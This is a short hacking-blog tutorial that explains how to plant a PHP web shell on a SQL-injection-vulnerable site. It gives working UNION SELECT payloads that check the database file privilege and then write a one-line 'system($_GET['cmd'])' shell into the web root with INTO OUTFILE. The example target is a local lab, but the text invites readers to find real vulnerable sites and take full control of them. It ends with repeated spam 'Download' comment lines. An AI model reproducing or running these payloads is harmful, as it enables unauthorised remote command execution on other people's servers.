Today We are going to learn how to gain and complete access to sqli vulnerable website by uploading the shell on that site
welcome back my Hackers
in this tutorial i am not going to include the basic of sqli exploitation process
but if you know how to find column,tables and other information ( i mean the basics of web hacking u can continue with this tutorial) -- But if You Are an N00b Then Click Here
Now Let me start
first of all lets find some sql vulnerable sites
then simple find:
No of columns
and then we have to see the file previlage if the shell is writable or not
for that :
http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=-1 union select 1,2,concat(user(),0x3a,file_priv),4 from mysql.user--
if it shows | Y | then its yes we can upload our SHELL
if it shows | N | then its no we cant upload our SHELL
ofter that now lets move to upload your shell
NoW Suppose you want to upload ur shell and the php code of shell is :
<?php system($_GET['cmd']);?>
and the name of the shell is imran.php
we are going to use the command for uploading our shell that is :
http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=-1 union select 1,2,"<?php system($_GET['cmd']);?>",4 INTO OUTFILE "/opt/lampp/htdocs/vulnerability/imran.php"
and BOOM ! your SHELL has been UPLOADED !
Hackers-Creed [ -Letus Exploit- ]: Upload Shell With Sql Injection -[ Beginners Guide]- >>>>> Download Now
ReplyDelete>>>>> Download Full
Hackers-Creed [ -Letus Exploit- ]: Upload Shell With Sql Injection -[ Beginners Guide]- >>>>> Download LINK
>>>>> Download Now
Hackers-Creed [ -Letus Exploit- ]: Upload Shell With Sql Injection -[ Beginners Guide]- >>>>> Download Full
>>>>> Download LINK dN